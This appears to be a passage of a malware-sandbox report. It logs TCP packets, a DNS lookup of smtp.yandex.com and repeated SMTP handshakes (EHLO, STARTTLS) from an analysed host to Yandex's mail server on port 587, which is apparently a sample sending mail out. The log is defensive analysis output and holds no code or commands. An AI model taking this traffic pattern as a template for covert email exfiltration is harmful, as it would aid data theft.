                                          Dec 9, 2024 07:03:30.418437958 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:30.418582916 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:30.538033962 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:30.858071089 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:30.858217001 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:30.977535009 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.298667908 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.301367998 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:31.420731068 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.742456913 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.742496014 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.742502928 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.742515087 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:31.742631912 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:31.744971037 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:31.748889923 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:31.868273973 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:32.188453913 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:32.189785004 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:32.309036016 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:32.629210949 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:32.629410982 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:32.748682022 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:33.068815947 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:33.071113110 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:33.190412998 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:33.626538992 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:33.626811981 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:33.746237993 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.077946901 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.078207970 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.130985022 CET50006587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.199244022 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.250411034 CET5875000677.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.526071072 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.526268005 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.580061913 CET5875000677.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.580089092 CET5875000677.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.580148935 CET50006587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.580621958 CET50006587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.582103968 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.645560980 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.699814081 CET5875000677.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.701385021 CET5875001077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:34.701452017 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:34.965812922 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:35.157198906 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:36.000834942 CET5875001077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:36.090214968 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.287240982 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.287240982 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.340301037 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.406734943 CET5875001077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.407404900 CET5875001077.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.407609940 CET50010587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.438982964 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.439060926 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.439060926 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.439109087 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.440113068 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.459809065 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.460026979 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.482922077 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.558443069 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.558459997 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.558480024 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.558491945 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.559808969 CET5875000977.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.559906006 CET50009587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:39.602274895 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:39.602391005 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:40.719456911 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:40.733187914 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:40.853674889 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:40.853818893 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:40.853991985 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:40.973016977 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.179744005 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.179949045 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:41.292591095 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.292793989 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:41.300785065 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.412245035 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.626732111 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.627233982 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:41.731415987 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.731803894 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:41.746530056 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:41.851205111 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.077795029 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.077816963 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.077827930 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.077867985 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.077907085 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.077960014 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.079931974 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.171905041 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.171966076 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.171987057 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.172003031 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.172014952 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.172053099 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.173939943 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.199232101 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.293302059 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.562211037 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.563288927 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.612232924 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.613030910 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:42.682565928 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:42.732289076 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.010087013 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.010272980 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:43.051137924 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.051333904 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:43.129594088 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.170526981 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.456929922 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.458957911 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:43.489617109 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.490736961 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:43.578353882 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.610138893 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.916258097 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.922513962 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:43.957093954 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:43.957263947 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:44.041830063 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.076590061 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.375861883 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.376185894 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:44.411957979 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.412123919 CET50012587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:44.495450020 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.531450987 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.828728914 CET5875001177.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.859827042 CET5875001277.88.21.158192.168.2.9
                                          Dec 9, 2024 07:03:44.875987053 CET50011587192.168.2.977.88.21.158
                                          Dec 9, 2024 07:03:44.907249928 CET50012587192.168.2.977.88.21.158

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 9, 2024 07:00:59.002684116 CET5498653192.168.2.91.1.1.1
                                          Dec 9, 2024 07:00:59.140990019 CET53549861.1.1.1192.168.2.9

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 9, 2024 07:00:59.002684116 CET192.168.2.91.1.1.10x2d59Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 9, 2024 06:59:24.652045012 CET1.1.1.1192.168.2.90xb90No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 9, 2024 06:59:24.652045012 CET1.1.1.1192.168.2.90xb90No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                          Dec 9, 2024 07:00:59.140990019 CET1.1.1.1192.168.2.90x2d59No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                          Dec 9, 2024 07:00:59.140990019 CET1.1.1.1192.168.2.90x2d59No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Dec 9, 2024 07:01:00.544867039 CET5874992577.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net Ok 1733724060-01eOMPMOpa60
                                          Dec 9, 2024 07:01:00.551925898 CET49925587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:00.985261917 CET5874992577.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:00.985441923 CET49925587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:01.419197083 CET5874992577.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:05.823023081 CET5874993877.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-87.sas.yp-c.yandex.net Ok 1733724065-51eQYvUOd4Y0
                                          Dec 9, 2024 07:01:05.823266029 CET49938587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:06.304347038 CET5874993877.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-87.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:06.304600954 CET49938587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:06.745522976 CET5874993877.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:08.332967997 CET5874994477.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-99.klg.yp-c.yandex.net Ok 1733724068-71eArLSOl4Y0
                                          Dec 9, 2024 07:01:08.333102942 CET49944587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:08.777648926 CET5874994477.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-99.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:08.777887106 CET49944587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:09.222524881 CET5874994477.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:14.646573067 CET5874996077.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-19.sas.yp-c.yandex.net Ok 1733724074-E1epJ5VOgSw0
                                          Dec 9, 2024 07:01:14.646939993 CET49960587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:15.094275951 CET5874996077.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-19.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:15.098274946 CET49960587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:15.547209024 CET5874996077.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:17.865916967 CET5874996977.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-37.myt.yp-c.yandex.net Ok 1733724077-H1ep1SMMi4Y0
                                          Dec 9, 2024 07:01:17.866041899 CET49969587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:18.302608013 CET5874996977.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-37.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:18.302742958 CET49969587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:18.738816023 CET5874996977.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:21.363073111 CET5874997877.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-90.myt.yp-c.yandex.net Ok 1733724081-K1eqKS4OruQ0
                                          Dec 9, 2024 07:01:21.363415956 CET49978587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:21.804974079 CET5874997877.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-90.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:22.022753954 CET49978587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:22.464142084 CET5874997877.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:35.427751064 CET5874998677.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-54.iva.yp-c.yandex.net Ok 1733724095-Z1er5wJOg0U0
                                          Dec 9, 2024 07:01:35.427992105 CET49986587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:35.864444971 CET5874998677.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-54.iva.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:35.864578962 CET49986587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:36.300962925 CET5874998677.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:37.905428886 CET5874998777.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net Ok 1733724097-b1e7JQSOcGk0
                                          Dec 9, 2024 07:01:37.905683994 CET49987587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:38.344230890 CET5874998777.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:38.344402075 CET49987587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:38.782881021 CET5874998777.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:42.603626966 CET5874998977.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1733724102-g1e8mqUOqiE0
                                          Dec 9, 2024 07:01:42.603765965 CET49989587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:43.052664042 CET5874998977.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:43.052922964 CET49989587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:43.501878023 CET5874998977.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:53.992669106 CET5874999077.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net Ok 1733724113-r1eAfPMOieA0
                                          Dec 9, 2024 07:01:53.992836952 CET49990587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:54.433454037 CET5874999077.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:54.433594942 CET49990587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:54.874098063 CET5874999077.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:01:55.661186934 CET5874999177.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-90.myt.yp-c.yandex.net Ok 1733724115-t1eiWS4OkW20
                                          Dec 9, 2024 07:01:55.661407948 CET49991587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:57.329433918 CET5874999277.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1733724117-u1e4UwUOda60
                                          Dec 9, 2024 07:01:57.329710007 CET49992587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:01:57.771334887 CET5874999277.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:01:57.771733046 CET49992587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:01:58.221415997 CET5874999277.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:00.168931961 CET5874999377.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net Ok 1733724119-x1e4673Oq4Y0
                                          Dec 9, 2024 07:02:00.169083118 CET49993587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:00.611042976 CET5874999377.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:00.611203909 CET49993587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:01.053896904 CET5874999377.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:07.356744051 CET5874999477.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1733724127-72eiR2VOrCg0
                                          Dec 9, 2024 07:02:07.366636038 CET49994587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:07.826627970 CET5874999477.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:07.826883078 CET49994587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:08.282279968 CET5874999477.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:12.828540087 CET5874999577.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-36.iva.yp-c.yandex.net Ok 1733724132-C2egPnJOma60
                                          Dec 9, 2024 07:02:12.830729008 CET49995587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:13.324636936 CET5874999577.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-36.iva.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:13.326798916 CET49995587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:13.771662951 CET5874999577.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:25.041153908 CET5874999677.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net Ok 1733724144-O2eaSOSOkOs0
                                          Dec 9, 2024 07:02:25.041337013 CET49996587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:25.490988970 CET5874999677.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:25.493029118 CET49996587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:25.944842100 CET5874999677.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:30.124624014 CET5874999777.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net Ok 1733724149-T2elsPMOpmI0
                                          Dec 9, 2024 07:02:30.124787092 CET49997587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:30.569044113 CET5874999777.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:30.569166899 CET49997587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:31.013211966 CET5874999777.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:36.567228079 CET5874999877.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1733724156-a2e7tEMOca60
                                          Dec 9, 2024 07:02:36.567368031 CET49998587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:37.008692026 CET5874999877.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:37.078955889 CET49998587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:37.520312071 CET5874999877.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:39.640546083 CET5874999977.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net Ok 1733724159-d2eCwPMOlOs0
                                          Dec 9, 2024 07:02:39.654000044 CET49999587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:39.799540043 CET5875000077.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-73.iva.yp-c.yandex.net Ok 1733724159-d2eDleJOhiE0
                                          Dec 9, 2024 07:02:39.806303978 CET50000587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:40.098134995 CET5874999977.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-39.myt.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:40.098531008 CET49999587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:40.250758886 CET5875000077.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-73.iva.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:40.251010895 CET50000587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:40.548526049 CET5874999977.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:40.695662022 CET5875000077.88.21.158192.168.2.9220 Go ahead
